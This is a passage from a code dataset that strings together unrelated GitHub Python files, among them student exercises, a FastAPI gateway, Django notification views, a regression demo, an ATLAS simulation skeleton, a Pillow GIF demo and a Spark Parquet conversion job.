'copy_speed': self.copy_speed}\n\n\nif __name__ == '__main__':\n printer = Printer('HP', 'Black', 12)\n scaner = Scanner('Canon', 'White', 15)\n copier = Copier('Canon', 'Gray', 23)\n print(f'printer: {printer}')\n print(f'scaner: {scaner}')\n print(f'copier: {copier}')\n storage = Storage()\n storage.add_technic(printer, 20)\n storage.add_technic(scaner, 50)\n print(f'storage: {storage.storage}')\n transportDep = TransportDepartment()\n storage.transfer_to_department(scaner, transportDep)\n print(f'transportDep storage: {transportDep.storage}')\n\n# Задание №7_______\n\n\n","repo_name":"Buanzu/Python","sub_path":"Homework_lesson_8.py","file_name":"Homework_lesson_8.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23545321481","text":"\nf=open(\"A-large.in\",\"r\")\nt=int(f.readline().strip(\"\\n\"))\nf2=open(\"A-large.out\",\"w\")\nfor y in range(1,1+t):\n l=f.readline().strip(\"\\n\").split()\n s=list(l[0])\n k=int(l[1])\n i=0\n c=0\n while True:\n\n while s[i]=='+' and i<=len(s)-k:\n i+=1\n\n if i<=len(s)-k:\n for j in range(i,i+k):\n s[j]=\"+\" if s[j]==\"-\" else \"-\"\n c+=1\n else:\n break\n\n\n r=True\n for j in range (len(s)-k,len(s)):\n if s[j]==\"-\":\n r=False\n if r:\n f2.write(\"Case #\"+str(y)+\": \"+str(c)+\"\\n\")\n else:\n f2.write(\"Case #\"+str(y)+\": \"+\"IMPOSSIBLE\"+\"\\n\")\nf.close()\nf2.close()\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/3067.py","file_name":"3067.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18249416203","text":"import json\nimport requests as rq\nfrom fastapi import FastAPI\n\n\n\n\napp = FastAPI()\n\n\n# Remember that this path is inside the docker container\nwith open(\"src/config.json\") as json_file:\n config = json.load(json_file)\n\nUSER_SERVICE_INFO = config[\"user_service\"]\nDATA_SERVICE_INFO = config[\"data_service\"] \n\n\n\n@app.get(\"/\")\ndef read_root():\n return \"********** SIMPLE FASTAPI **********\"\n\n\n############### HEALTH ###############\n@app.get(\"/api/health\")\ndef read_health():\n return {\"status\" : \"ok\"}\n\n\n@app.get(\"/api/user/health\")\ndef read_user_health():\n url = USER_SERVICE_INFO[\"base_url\"] + USER_SERVICE_INFO[\"health_route\"]\n\n response = rq.get(url)\n\n content = response.json()\n\n return content\n\n\n@app.get(\"/api/data/health\")\ndef read_data_health():\n\n url = DATA_SERVICE_INFO[\"base_url\"] + DATA_SERVICE_INFO[\"health_route\"]\n\n response = rq.get(url)\n\n content = response.json()\n\n return content\n\n\n\n\n############### CREATE ###############\n@app.post(\"/api/user/create\")\ndef create_user(data: dict):\n \n headers = {\n \"Content-Type\": \"application/json\"\n }\n \n url = USER_SERVICE_INFO[\"base_url\"] + USER_SERVICE_INFO[\"create_route\"]\n\n response = rq.post(url, json=data, headers=headers)\n\n content = response.json()\n \n return content\n\n\n\n## create\n@app.post(\"/api/data\")\ndef create_indicator(data: dict):\n \n headers = {\n \"Content-Type\": \"application/json\"\n }\n\n url = DATA_SERVICE_INFO[\"base_url\"] + DATA_SERVICE_INFO[\"create_route\"]\n\n response = rq.post(url, json=data, headers=headers)\n\n content = response.json()\n \n return content\n\n\n## update\n@app.patch(\"/api/data/{id}\")\ndef update_indicator(slug: str, data: dict):\n \n headers = {\n \"Content-Type\": \"application/json\"\n 
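# The A-large loop above physically re-flips k pancakes per operation, which
# is O(n*k) per case. The same greedy runs in O(n) with a parity array marking
# where flip windows end:
def min_flips(s, k):
    n = len(s)
    stop = [0] * (n + 1)   # stop[i] == 1: a flip window ends just before i
    parity = 0             # number of windows covering position i, mod 2
    count = 0
    for i in range(n):
        parity ^= stop[i]
        if (s[i] == '-') != bool(parity):   # pancake i shows the blank side
            if i + k > n:
                return None                 # IMPOSSIBLE
            count += 1
            parity ^= 1
            stop[i + k] ^= 1
    return count

# min_flips('---+-++-', 3) -> 3; min_flips('-+-+-', 4) -> None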
}\n\n # .format is a necessity becuase the update_route contains a place holder and using something like \"+ slug\" will keep the placeholder as a str and makes the url invalid!\n url = DATA_SERVICE_INFO[\"base_url\"] + DATA_SERVICE_INFO[\"update_route\"].format(slug=slug)\n\n response = rq.put(url, json=data, headers=headers)\n\n content = response.json()\n \n return content\n\n\n## upsert\n@app.put(\"/api/data\")\ndef create_indicator(data: dict):\n \n headers = {\n \"Content-Type\": \"application/json\"\n }\n\n url = DATA_SERVICE_INFO[\"base_url\"] + DATA_SERVICE_INFO[\"create_route\"]\n\n response = rq.post(url, json=data, headers=headers)\n\n content = response.json()\n \n return content\n\n\n\n\n############### GET ###############\n@app.get(\"/api/data/content\")\ndef get_all_indicators():\n \n url = DATA_SERVICE_INFO[\"base_url\"] + DATA_SERVICE_INFO[\"get_all_route\"]\n\n response = rq.get(url)\n\n content = response.json()\n \n return content \n\n\n@app.get(\"/api/user/content/{slug}\")\ndef get_user(slug: str):\n \n url = USER_SERVICE_INFO[\"base_url\"] + USER_SERVICE_INFO[\"get_one_route\"].format(slug=slug)\n \n response = rq.get(url)\n\n content = response.json()\n \n return content \n\n\n@app.get(\"/api/data/content/{slug}\")\ndef get_indicator(slug: str):\n \n url = DATA_SERVICE_INFO[\"base_url\"] + DATA_SERVICE_INFO[\"get_one_route\"].format(slug=slug)\n\n response = rq.get(url)\n \n content = response.json()\n \n return content \n\n\n############### DELETE ###############\n@app.get(\"/api/user/delete/{slug}\")\ndef delete_user(slug: str):\n \n url = USER_SERVICE_INFO[\"base_url\"] + USER_SERVICE_INFO[\"delete_route\"].format(slug=slug)\n\n response = rq.get(url)\n\n content = response.json()\n \n return content\n\n\n@app.get(\"/api/data/delete/{slug}\")\ndef delete_indicator(slug: str):\n \n url = DATA_SERVICE_INFO[\"base_url\"] + DATA_SERVICE_INFO[\"delete_route\"].format(slug=slug)\n\n response = rq.get(url)\n\n content = response.json()\n \n return content","repo_name":"Wasim-Haj-Ali/dude_path","sub_path":"src/gateway_service/api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36431744836","text":"from django.shortcuts import redirect\n\nfrom notifications.models import Notification\n\nimport xadmin\nfrom xadmin import views\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\n\nclass Noticeview(views.CommAdminView):\n def set_page_obj(self,objects):\n try:\n page = self.request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n p = Paginator(objects, 10,request=self.request)\n notices=p.page(page)\n context = super().get_context()\n context[\"notices_pageobj\"]=notices\n context[\"count\"] = len(objects)\n self.context=context\n def set_obj_breadcrumbs(self,dict):\n context = super().get_context()\n context[\"breadcrumbs\"].append(dict)\n context[\"title\"] = dict.get('title')\n self.context = context\n def get_context(self):\n return super().get_context()\n\n\nclass UnreadView(Noticeview):\n def update_to_do(self):\n request=self.request\n to_do=request.GET.get('todo',None)\n if not to_do: return\n if to_do=='all':\n self.user.notifications.unread().mark_all_as_read()\n elif to_do=='top':\n ids=[notify.id for notify in self.user.notifications.unread()[:10]]\n Notification.objects.filter(id__in=ids).mark_all_as_read()\n else:\n try:\n id = int(to_do)\n n=Notification.objects.get(id=id)\n n.mark_as_read()\n return 
n.get_target_url()\n except:\n pass\n\n def get(self, request, *args, **kwargs):\n re=self.update_to_do()\n if re:return redirect(re)\n self.set_obj_breadcrumbs({'url': '/notice/unread/', 'title': \"未读消息\"})\n objects=self.user.notifications.unread().exclude(status=\"待发送\").prefetch_related('nfrom').myprefetch_related('actor','target')\n self.set_page_obj(objects)\n context=self.context\n context[\"type\"]='未读通知'\n return self.template_response('xadmin/views/messages.html', context)\nxadmin.site.register_view(r'notice/unread/$', UnreadView,name='unread')\n\n\nclass ReadView(Noticeview):\n def update_to_do(self):\n request=self.request\n to_do=request.GET.get('todo',None)\n if not to_do:return\n if to_do=='all':\n self.user.notifications.read().mark_all_as_deleted()\n elif to_do=='top':\n ids = [notify.id for notify in self.user.notifications.read()[:10]]\n Notification.objects.filter(id__in=ids).mark_all_as_deleted()\n else:\n try:\n id=int(to_do)\n Notification.objects.filter(id=id).mark_all_as_deleted()\n except:\n pass\n\n def get(self, request, *args, **kwargs):\n self.update_to_do()\n self.set_obj_breadcrumbs({'url': 'notice/read/', 'title': \"已读消息\"})\n objects = self.user.notifications.read().exclude(status=\"待发送\").prefetch_related('nfrom').myprefetch_related('actor','target')\n self.set_page_obj(objects)\n context = self.context\n context[\"type\"]='已读通知'\n return self.template_response('xadmin/views/messages_read.html', context)\n\nxadmin.site.register_view(r'notice/read/$', ReadView,name='read')","repo_name":"htyangya/scwork","sub_path":"common/views/notification.py","file_name":"notification.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42605830208","text":"def isHappy(n):\r\n while n != 1:\r\n n=sum([int(i)**2 for i in str(n)])\r\n if n==4:\r\n return False\r\n return True\r\n#print(isHappy(19))\r\n\r\ndef fizzBuzz(n):\r\n return ['FizzBuzz' if i%15==0 else 'Buzz' if i%5==0 else 'Fizz' if i%3==0 else str(i) for i in range(1,n+1)]\r\n#print(fizzBuzz(5))\r\n\r\ndef truncateSentence(s,k):\r\n words=s.split(\" \")\r\n return \" \".join(words[0:k])\r\n#print(truncateSentence(\"Hello how are you Contestant\",4))\r\n\r\ndef solution(words):\r\n codes={\"a\": \".-\", \"b\": \"-...\", \"c\": \"-.-.\", \"d\": \"-..\", \"e\": \".\", \"f\": \"..-.\", \"g\": \"--.\", \"h\": \"....\", \"i\": \"..\",\r\n \"j\": \".---\", \"k\": \"-.-\", \"l\": \".-..\", \"m\": \"--\", \"n\": \"-.\", \"o\": \"---\", \"p\": \".--.\", \"q\": \"--.-\",\r\n \"r\": \".-.\", \"s\": \"...\", \"t\": \"-\", \"u\": \"..-\", \"v\": \"...-\", \"w\": \".--\", \"x\": \"-..-\", \"y\": \"-.--\", \"z\": \"--..\"}\r\n res=set()\r\n for word in words:\r\n m=[]\r\n for ch in word:\r\n m.append(codes.get(ch))\r\n res.add(\"\".join(m))\r\n return len(res)\r\n\r\n\r\n\r\n","repo_name":"hyewon0214/hyewon","sub_path":"0625.py","file_name":"0625.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33451526118","text":"class Solution:\n def arrayChange(self, nums: List[int], operations: List[List[int]]) -> List[int]:\n num_index = {}\n for index in range(len(nums)):\n num_index[nums[index]] = index\n for old,new in operations:\n index = num_index[old]\n nums[index] = new\n num_index[new] = num_index.pop(old)\n return nums\n \n \n \n \n 
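# The magic constant 4 in isHappy() above works because every unhappy number
# eventually enters the cycle that contains 4; a version that does not rely
# on that fact just remembers the values already seen:
def is_happy(n):
    seen = set()
    while n != 1 and n not in seen:
        seen.add(n)
        n = sum(int(d) ** 2 for d in str(n))
    return n == 1

# is_happy(19) -> True; is_happy(2) -> False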
","repo_name":"yonasengdu/Compitative-programming","sub_path":"2295-replace-elements-in-an-array/2295-replace-elements-in-an-array.py","file_name":"2295-replace-elements-in-an-array.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"39181559738","text":"#https://www.hackerrank.com/challenges/python-print/problem?h_r=next-challenge&h_v=zen&h_r=next-challenge&h_v=zen\n\"\"\"The included code stub will read an integer,n, from STDIN.\n\nWithout using any string methods, try to print the following:\n\n\nNote that \"\" represents the consecutive values in between.\n\nExample\nn=5\nPrint the string 12345\"\"\"\n\nn = int(input(\"enter a number\"))\na=[]\nif n>=1 and n<=150:\n for i in range(1,n+1):\n a.append(str(i))\n print(''.join(a))","repo_name":"prasoons075/Python_Learning","sub_path":"HackerRank/02.print_function.py","file_name":"02.print_function.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72314020993","text":"# Importing the libraries\r\nimport pandas as pd \r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\n\r\n# Importing the dataset\r\ndataset = pd.read_csv('student_scores1.csv') \r\n#moving column 1 to x\r\nX = dataset.iloc[:,:-1].values \r\n#moving column 2 to y\r\ny = dataset.iloc[:, 1].values \r\n\r\n\r\n#dataset.shape \r\n \r\n#dataset.keys()\r\n\r\n# Taking care of missing data\r\nfrom sklearn.preprocessing import Imputer\r\n#replacing missing with mean\r\nimputer = Imputer(missing_values = 'NaN', strategy = 'mean', axis = 0)\r\nimputer = imputer.fit(X[:, 0:1])\r\n#transfering imputed values back to X\r\nX[:,0:1] = imputer.transform(X[:,0:1])\r\n\r\n# Splitting the dataset into the Training set and Test set\r\nfrom sklearn.model_selection import train_test_split \r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0) \r\n\r\nfrom sklearn.linear_model import LinearRegression \r\n#creating regressor object of linear regression\r\nregressor = LinearRegression() \r\nregressor.fit(X_train, y_train)\r\n\r\n\r\ny_pred = regressor.predict(X_test)\r\n\r\n\r\nfrom sklearn import metrics \r\n#print('Mean Absolute Error:', metrics.mean_absolute_error(y_test, y_pred)) \r\nprint('Mean Squared Error:', metrics.mean_squared_error(y_test, y_pred)) \r\n#print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(y_test, y_pred))) \r\n\r\n#plt.scatter(X_train, y_train, color = 'red')\r\n#plt.plot(X_train, regressor.predict(X_train), color = 'blue')\r\n#plt.title('Hours vs Percentage') \r\n#plt.xlabel('Hours Studied') \r\n#plt.ylabel('Percentage Score') \r\n#plt.show()\r\n\r\n\r\nplt.scatter(X_test, y_test, color = 'red')\r\n#plt.plot(X_test, y_test, color = 'blue')\r\nplt.plot(X_test, regressor.predict(X_test), color = 'blue')\r\nplt.title('Hours vs Percentage') \r\nplt.xlabel('Hours Studied') \r\nplt.ylabel('Percentage Score') \r\nplt.show()","repo_name":"haseena-hassan/Machine-Learning","sub_path":"Linear & Logistic regression/student_scores.py","file_name":"student_scores.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27015929829","text":"import book_fun\r\nimport os\r\nbook_fun.print_options()\r\noption = input()\r\nbooks=[]\r\nwhile option!='X' and option !='x':\r\n if option =='1':\r\n 
books.append(book_fun.create_book())\r\n book_fun.create_book()\r\n input(\"command executed... press any button to continue\")\r\n elif option=='2':\r\n book_fun.save_book(books)\r\n elif option=='3':\r\n books=book_fun.load_books()\r\n elif option=='4':\r\n book_fun.find_book(books,\"12\")\r\n elif option=='5':\r\n book_fun.issue_book(books)\r\n elif option=='6':\r\n book_fun.return_book(books)\r\n else:\r\n print(\"the given command doesn't exsits\")\r\n input(\"press enter to continuee....\")\r\n os.system(\"cls\")\r\n book_fun.print_options()\r\n option=input()\r\n","repo_name":"aasthagupt/Library_management_system","sub_path":"lib manage/book_1.py","file_name":"book_1.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34747509003","text":"# Name Printing Checkerboard pattern\n\"\"\"\nCreated on Mon Jun 3 17:38:36 2019\n\n@author: Himanshu Rathore\n\"\"\"\ntotal_lines = int(input(\"Enter total no. lines you want in checker >\"))\n# Take counter for number of lines\ncounter = 1\nwhile (counter <= total_lines):\n # selects line on even number\n if counter%2==0:\n print(\" *\" * 8)\n # selects line on odd number\n else:\n print(\"* \" * 8)\n counter+=1","repo_name":"himanshu2922t/FSDP_2019","sub_path":"DAY-01/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29887429574","text":"import pandas as pd\n\nYES = 'Y'\nNO = 'N'\n\nEditorChoices = (\n (YES, 'Yes'),\n (NO, 'No'),\n)\n\n\ndef populate_data_from_csv(csv_file_path='./main_app/games_data.csv'):\n from main_app.models import GameGenre, GamePlatform, Game\n dataframe = pd.read_csv(csv_file_path)\n print(\"populating\", len(dataframe), \"records\")\n for i in range(len(dataframe)):\n print(\"record no\", i)\n title = dataframe.iloc[i].title\n platform_name = dataframe.iloc[i].platform\n score = dataframe.iloc[i].score\n genre_name = dataframe.iloc[i].genre\n editors_choice = dataframe.iloc[i].editors_choice\n\n genre = GameGenre.objects.get_or_create(name=genre_name)[0]\n platform = GamePlatform.objects.get_or_create(name=platform_name)[0]\n\n Game.objects.get_or_create(title=title, platform=platform, score=score, genre=genre,\n editors_choice=editors_choice)\n","repo_name":"nimishbansal/cgipython","sub_path":"main_app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24565498480","text":"import socket\nfrom urllib.request import urlopen, URLError, HTTPError\nimport time\nsocket.setdefaulttimeout( 1 ) # timeout in seconds\nurl = 'http://myELB-1089638098.ap-south-1.elb.amazonaws.com'\n\nwhile(1):\n try :\n response = urlopen( url )\n except HTTPError as e:\n print ('The server couldn\\'t fulfill the request. Reason:', str(e.code))\n except URLError as e:\n print ('We failed to reach a server. 
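# populate_data_from_csv() above performs five .iloc lookups per row; reading
# each row once with itertuples() is simpler and much faster on large frames
# (same models and get_or_create calls as in the function):
for row in dataframe.itertuples(index=False):
    genre = GameGenre.objects.get_or_create(name=row.genre)[0]
    platform = GamePlatform.objects.get_or_create(name=row.platform)[0]
    Game.objects.get_or_create(title=row.title, platform=platform,
                               score=row.score, genre=genre,
                               editors_choice=row.editors_choice)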
Reason:', str(e.reason))\n \"\"\"else :\n html = response.read()\"\"\"\n time.sleep(0.5)","repo_name":"rajeshk97/AWS_AutoScaling_Implementation","sub_path":"ping.py","file_name":"ping.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71105193153","text":"import sys\nfrom PyJobTransforms.CommonRunArgsToFlags import commonRunArgsToFlags\nfrom PyJobTransforms.TransformUtils import processPreExec, processPreInclude, processPostExec, processPostInclude\nfrom SimuJobTransforms.CommonSimulationSteering import CommonSimulationCfg, specialConfigPreInclude, specialConfigPostInclude\n\n# temporarily force no global config flags\nfrom AthenaConfiguration import AllConfigFlags\ndel AllConfigFlags.ConfigFlags\n\n\ndef fromRunArgs(runArgs):\n from AthenaCommon.Logging import logging\n log = logging.getLogger('Sim_tf')\n log.info('****************** STARTING Simulation *****************')\n\n log.info('**** Transformation run arguments')\n log.info(str(runArgs))\n\n log.info('**** Setting-up configuration flags')\n from AthenaConfiguration.AllConfigFlags import initConfigFlags\n from SimulationConfig.SimEnums import SimulationFlavour\n flags = initConfigFlags()\n\n commonRunArgsToFlags(runArgs, flags)\n\n # Set ProductionStep\n from AthenaConfiguration.Enums import ProductionStep\n flags.Common.ProductionStep = ProductionStep.Simulation\n\n # Set the simulator\n if hasattr(runArgs, 'simulator'):\n flags.Sim.ISF.Simulator = SimulationFlavour(runArgs.simulator)\n\n # This is ISF and resimulation\n flags.Sim.ISFRun = True\n flags.Sim.ISF.ReSimulation = True\n\n # Generate detector list\n from SimuJobTransforms.SimulationHelpers import getDetectorsFromRunArgs\n detectors = getDetectorsFromRunArgs(flags, runArgs)\n\n if hasattr(runArgs, 'inputHITSFile'):\n flags.Input.Files = runArgs.inputHITSFile\n else:\n log.error('No inputHITSFile provided. 
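# A slightly more informative version of the ELB probe loop above: report the
# HTTP status and latency on success as well (same urllib machinery):
import time
from urllib.request import urlopen

def probe(url, timeout=1):
    t0 = time.time()
    try:
        with urlopen(url, timeout=timeout) as response:
            print('OK', response.getcode(), '%.0f ms' % ((time.time() - t0) * 1e3))
    except Exception as e:
        print('FAIL', e)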
Please try using Sim_tf.py instead.')\n raise RuntimeError('No intputHITSFile provided.')\n\n if hasattr(runArgs, 'outputHITS_RSMFile'):\n if runArgs.outputHITS_RSMFile == 'None':\n flags.Output.HITSFileName = ''\n else:\n flags.Output.HITSFileName = runArgs.outputHITS_RSMFile\n\n # Setup detector flags\n from AthenaConfiguration.DetectorConfigFlags import setupDetectorFlags\n setupDetectorFlags(flags, detectors, toggle_geometry=True)\n\n # Setup perfmon flags from runargs\n from PerfMonComps.PerfMonConfigHelpers import setPerfmonFlagsFromRunArgs\n setPerfmonFlagsFromRunArgs(flags, runArgs)\n\n # Pre-include\n processPreInclude(runArgs, flags)\n\n # Special Configuration preInclude\n specialConfigPreInclude(flags)\n\n # Pre-exec\n processPreExec(runArgs, flags)\n\n # Common simulation runtime arguments\n from SimulationConfig.SimConfigFlags import simulationRunArgsToFlags\n simulationRunArgsToFlags(runArgs, flags)\n\n # To respect --athenaopts \n flags.fillFromArgs()\n\n # Lock flags\n flags.lock()\n\n cfg = CommonSimulationCfg(flags, log)\n\n # Add OLD suffix to the names of collections read in from the input HITS file\n from SimuJobTransforms.ReSimInputConfig import RenameHitCollectionsOnReadCfg\n cfg.merge(RenameHitCollectionsOnReadCfg(flags))\n\n # Special Configuration postInclude\n specialConfigPostInclude(flags, cfg)\n\n # Post-include\n processPostInclude(runArgs, flags, cfg)\n\n # Post-exec\n processPostExec(runArgs, flags, cfg)\n\n # Write AMI tag into in-file metadata\n from PyUtils.AMITagHelperConfig import AMITagCfg\n cfg.merge(AMITagCfg(flags, runArgs))\n\n import time\n tic = time.time()\n # Run the final accumulator\n sc = cfg.run()\n log.info(\"Run resimulation in \" + str(time.time()-tic) + \" seconds\")\n\n sys.exit(not sc.isSuccess())\n","repo_name":"Yusuf-Manjra/athena","sub_path":"Simulation/SimuJobTransforms/python/ReSimulation_Skeleton.py","file_name":"ReSimulation_Skeleton.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71303723716","text":"from PIL import Image, ImageEnhance\nimport os\n\nfileDir = os.path.dirname(os.path.realpath(__file__))\nsrcPath = fileDir + \"\\\\barnE.jpg\"\nbarnE = Image.open(srcPath)\n\nprint('Pillow is a plugin that allows python to open images using Image')\nbarnE.show()\n\nprint('Press enter to continue.')\ninput()\n\nprint('It can edit the color of images and apply filters using ImageEnhance')\nbw = ImageEnhance.Color(barnE)\nbw.enhance(0).show(\"Black and White\")\n\nprint('Press enter to continue.')\ninput()\n\nprint('It can also be used to create GIFs')\nr0 = barnE\nr1 = barnE.rotate(45)\nr2 = barnE.rotate(90)\nr3 = barnE.rotate(135)\nr4 = barnE.rotate(180)\nr5 = barnE.rotate(225)\nr6 = barnE.rotate(270)\nr7 = barnE.rotate(315)\n\nspinPath = fileDir + \"\\\\barnSpin.gif\"\nr0.save(spinPath, save_all=True, append_images=[r1, r2, r3, r4, r5, r6, r7], duration = 50, loop = 0)\nspin = Image.open(spinPath)\n\nprint('GIFs will only open as still images when opened through PIL')\nprint('All of their frames will be accessible, however')\nprint('A GIF was just saved in the same directory this script is in')\nprint('To test, we can use [name].is_animated: ' + str(spin.is_animated))\nprint('We can also see how many frames it has, this one has ' + 
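# The tic/toc pair at the end of fromRunArgs() above could be factored into a
# reusable timing context manager (plain stdlib; a sketch, not an existing
# Athena utility):
import time
from contextlib import contextmanager

@contextmanager
def timed(log, label):
    tic = time.time()
    try:
        yield
    finally:
        log.info("%s took %.1f s", label, time.time() - tic)

# with timed(log, "resimulation"):
#     sc = cfg.run()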
str(spin.n_frames))","repo_name":"vandewar/it3038c-scripts","sub_path":"python/Lab7/Lab7.py","file_name":"Lab7.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71076757314","text":"\"\"\"\nWrite a program that takes a list of strings as input. The program should print each string\non its own line. However, if a string starts with the letter 'A', the program\nshould skip that string and move on to the next one using the continue statement.\n\"\"\"\n# Solution\nlista_cuvinte = input(\"Enter words separated by commas:\\n\").split(\", \")\nfor word in lista_cuvinte:\n    if word[0].upper() == 'A':\n        continue\n    print(word)\n# solution with while\ni = 0\nwhile i < len(lista_cuvinte):\n    if lista_cuvinte[i][0].upper() == 'A':\n        i += 1\n        continue\n    print(lista_cuvinte[i])\n    i += 1\n","repo_name":"dabija1989/Learning_python_100_days_coding","sub_path":"home_work 8/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71151256194","text":"print('Task 1. Sum of numbers')\n\ndef summa_n(N):\n    summa = 0\n    for i in range(1,N+1):\n        summa+=i\n    print(f\"I know that the sum of the numbers from 1 to {N} is {summa}\")\n\nN = int(input(\"Enter a number \"))\nsumma_n(N)","repo_name":"DefaultPerson/python-learn-guide","sub_path":"python_course/python_course_answers/module_1_2/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"70981032195","text":"import boto3\nfrom botocore.exceptions import ClientError\nfrom pyspark.sql import SparkSession\n\n# Create the Spark session\nspark = SparkSession.builder.getOrCreate()\n\n# Path of the input CSV file\nmovies_csv_file = \"s3://natalias-s3-bucket/Raw/Local/CSV/Movies/2023/04/26/movies.csv\"\n\n# Name and folder of the output bucket\noutput_bucket = \"natalias-s3-bucket\"\noutput_folder = \"Trusted/Parquet/Movies/\"\n\n# Full path to the \"trusted\" folder\ntrusted_folder = f\"{output_folder}trusted/\"\n\n# Check whether the \"trusted\" folder already exists in the output bucket\ns3_client = boto3.client(\"s3\")\ntry:\n    s3_client.head_object(Bucket=output_bucket, Key=f\"{trusted_folder}dummy-file\")\nexcept ClientError:\n    # The \"trusted\" folder does not exist, so create it\n    s3_client.put_object(Bucket=output_bucket, Key=f\"{trusted_folder}dummy-file\")\n\n# Read the CSV data, inferring the schema automatically\nmovies_read = spark.read.option(\"header\", True).option(\"sep\", \"|\").option(\"inferSchema\", True).csv(movies_csv_file)\n\n# Write the data as Parquet to the output bucket\nmovies_read.coalesce(1).write.mode(\"overwrite\").parquet(f\"s3://{output_bucket}/{output_folder}\")\n","repo_name":"nataliasguimaraes/movie_analysis","sub_path":"trusted/tentativas_trusted/trusted.py","file_name":"trusted.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16151649356","text":"### For\r\nlst=[1,2,3,4,5,6]\r\nfor ele in lst:\r\n    print(ele**2)\r\n\r\n### Range: printing the multiples of 2\r\nfor i in range(2,10,2):\r\n    print(i)\r\n\r\n### Enumerate\r\nl1 = [\"January\",\"February\",\"March\"]\r\ns1 = \"Olive\"\r\n \r\n# creating enumerate objects\r\nobj1 = 
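# The eight rotate() calls in the Pillow GIF script above can be generated in
# one comprehension; same API, just less repetition:
frames = [barnE.rotate(angle) for angle in range(0, 360, 45)]
frames[0].save(spinPath, save_all=True, append_images=frames[1:],
               duration=50, loop=0)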
enumerate(l1)\r\nobj2 = enumerate(s1)\r\n\r\nprint(list(obj1))\r\nprint(list(obj2))\r\n\r\n### List comprehension\r\nobj = [\"Even\" if i%2==0 else \"Odd\" for i in range(1,20,3)]\r\nprint(obj)\r\n\r\n### Generators\r\n #Basic generator functions\r\nimport random\r\n\r\ndef lottery():\r\n for i in range(6):\r\n\r\n yield random.randint(1,15) \r\nfor ele in lottery():\r\n print(\"And the next number is... !\" , ele)\r\n\r\n### LAMBDA\r\nadder = lambda x, y: x + y\r\nprint(adder (1, 2))\r\n\r\n# filter() with lambda() \r\nlst = [i for i in range(2,20)] \r\n \r\nfilter_list = list(filter(lambda x: (x%2 != 0) , lst)) \r\nprint(filter_list)\r\n\r\n# map() with lambda()\r\nlst1 = [i for i in range(6,12)] \r\n \r\nmap_list = list(map(lambda x: x*2, lst1)) \r\nprint(map_list) \r\n\r\n# reduce() with lambda() \r\n\r\n \r\nfrom functools import reduce\r\nlst3 = [5, 8, 10, 20, 50, 100] \r\nmax = reduce(lambda a,b : a if a > b else b, lst3)\r\nprint(max)","repo_name":"saranyasivam98/Training-Projects","sub_path":"for_range_enumerate_generators.py","file_name":"for_range_enumerate_generators.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32272197896","text":"import os\nimport re\n\nfrom aquilon.exceptions_ import IncompleteError, ArgumentError\nfrom aquilon.worker.broker import BrokerCommand # pylint: disable=W0611\nfrom aquilon.worker.dbwrappers.branch import get_branch_and_author\nfrom aquilon.worker.dbwrappers.host import hostname_to_host\nfrom aquilon.worker.templates.host import PlenaryHost\nfrom aquilon.worker.locks import lock_queue, CompileKey\nfrom aquilon.worker.processes import run_git\nfrom aquilon.aqdb.model import Sandbox\nfrom aquilon.worker.formats.branch import AuthoredSandbox\nfrom aquilon.exceptions_ import ProcessException\n\n\ndef validate_branch_commits(dbsource, dbsource_author,\n dbtarget, dbtarget_author, logger, config):\n domainsdir = config.get('broker', 'domainsdir')\n if isinstance(dbsource, Sandbox):\n authored_sandbox = AuthoredSandbox(dbsource, dbsource_author)\n source_path = authored_sandbox.path\n else:\n source_path = os.path.join(domainsdir, dbsource.name)\n\n if isinstance(dbtarget, Sandbox):\n authored_sandbox = AuthoredSandbox(dbtarget, 